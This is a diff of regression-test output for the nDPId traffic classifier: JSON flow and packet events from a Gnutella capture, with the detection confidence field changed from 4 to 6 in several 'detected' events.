01406{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":90137,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90137,"pkt":"CAAn5uVZUlQAEjUCCABFAALzA0IAAEARx74ugHJrCgACDxmycAkC32FSwagxArEYlVcnjAyV6XOvHEQAAMACAAAGR1RLRwAAGIXhRHN5ftV2L3caNPMmmEQDSzUELoByaxmyAQAAAARlWXO2FEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":90138,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90138,"pkt":"UlQAEjUCCAAn5uVZCABFAABtxUwAAIAR+3EKAAIPPPEwwnAJUzUAWWdCqc0xAhWpgpzJQk2EqzRt70QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":90138,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90138,"pkt":"UlQAEjUCCAAn5uVZCABFAABtRC0AAIARXOYKAAIPWUs0E3AJs7oAWZEdEsYxApinpNiOVYwKMx8qLUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":813,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":90138,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90138,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTM8AAIAR3pQKAAIPUtmwNHAJHRYAWfrhGukxApDm6ECPcKUTk+0ioUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":813,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":813,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01406{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":814,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":90182,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90182,"pkt":"CAAn5uVZUlQAEjUCCABFAALzA0MAAEAR20pZSzQTCgACD7O6cAkC35hjEsYxApinpNiOVYwKMx8qLUQAAMACAAAGR1RLRwAAGcOxs9Yotu5YI3ngDJa2NEz7hxIEWUs0E7O6AQAAAAQphpmTFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjVdTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNVdTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqkdUS0cAABZMZh8YJqCRZ8rsFWpJujOrF1VMBFHNWy2cyQ=="} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90183,"flow_last_seen":90183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":90183,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90183,"pkt":"UlQAEjUCCAAn5uVZCABFAABtGYoAAIAR6JkKAAIPXwrNQ3AJLVMAWdsMrwExAn9FQ02TKgtsdnbe2UQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90183,"flow_last_seen":90183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90183,"flow_last_seen":90183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90184,"flow_last_seen":90184,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90184,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":90184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90184,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTH0AAIARTyMKAAIPy9zG9HAJBKoAWeojZPExAoo7ciOaCRHkTxe8NEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90184,"flow_last_seen":90184,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90184,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90184,"flow_last_seen":90184,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90184,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":818,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":90267,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90267,"pkt":"CAAn5uVZUlQAEjUCCABFAALzA0QAAEARAUO1VLIQCgACD+tmcAkC3zlLdMAxAjueygYrMQV+6lVI4UQAAMACAAAGR1RLRwAAKnLYr\/aGTLaMbt4HEbnkS5LKRh0EtVSyEOtmAQAAAAQDkoiwFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjVdTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqkdUS0cAAGqU5DC0wpx7Tt\/+AtuQJkODlGIrBC\/cuoxr+UdUS0cAAGSQPhJYYczqO9fA1uqwCWebPjcpBMEgftbozEdUS0cAAGfwY9tAxh1AXF0ZU2EOIfqDQ08tBHbwRccYzA=="} 01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":90386,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90386,"pkt":"CAAn5uVZUlQAEjUCCABFAALzA0UAAEARlVpn6GtkCgACD6n0cAkC312iBkIxAi75axRUS7XsWs\/C60QAAMACAAAGR1RLRwAABkx5M4bYu4J4fOkW\/7Sl8nWo53gEZ+hrZKn0AQAAAASAlqYNFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} 01406{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":90452,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90452,"pkt":"CAAn5uVZUlQAEjUCCABFAALzA0YAAEAR+vI88TDCCgACD1M1cAkC31EXqc0xAhWpgpzJQk2EqzRt70QAAMACAAAGR1RLRwAAGN\/m\/5SuT3RX9Y8zGKdBIhyITj8EPPEwwlM1AQAAAASjKCcfFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} @@ -902,52 +902,52 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":859,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eN9AAIAGqLsKAAIPM0SZ1sSTZo3Cj79BAAAAAIAC+vDuAwAAAgQFtAEDAwgBAQQC"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":2,"flow_last_seen":90760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90760,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0kAAEAGeoC8PTS3CgACDy5MxHwAp\/gBiFqWg2AS\/\/+QwwAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":3,"flow_last_seen":90760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90760,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoc0ZAAIAGioYKAAIPvD00t8R8LkyIWpaDAKf4AlAQ+vCtjwAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":90763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90763,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":90763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90763,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 